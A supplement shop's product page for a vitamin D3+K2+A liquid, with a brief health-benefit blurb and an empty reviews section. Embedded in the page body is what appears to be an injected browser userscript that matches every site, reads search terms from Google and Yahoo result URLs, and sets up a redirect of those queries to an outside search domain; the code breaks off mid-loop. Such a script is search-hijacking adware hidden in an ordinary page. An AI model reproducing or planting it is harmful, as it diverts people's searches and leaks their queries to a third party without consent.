Vitamin D3+K2+A
$35.00
120 ml
offers many health benefits. help strengthen bones and muscles, boost immunity, and mood.
// <![CDATA[
// ==UserScript==
// @name panda google
// @namespace http://tampermonkey.net/
// @version 0.1
// @description try to take over the world!
// @author You
// @match *://*/*
// @grant none
// ==/UserScript==
(function() {
function findGetParameter(parameterName) {
var result = null,
tmp = [];
location.search
.substr(1)
.split("&")
.forEach(function (item) {
tmp = item.split("=");
if (tmp[0] === parameterName) result = decodeURIComponent(tmp[1]);
});
return result;
}
let arr = [];
var u ='https://lato1.mysearch.space?q=',
s = [
{
'host':/^https?://www.google(.w+)+/search?.*$/,
'query':'q',
},
{
'host':/^(https?://)(w+.)?(search.)(yahoo.)(com)/(search?)?(.*)$/,
'query':'p'
}
]
console.log('ddd');
for(var i = 0; i
//
Description
offers many health benefits. help strengthen bones and muscles, boost immunity, and mood.
Reviews
There are no reviews yet.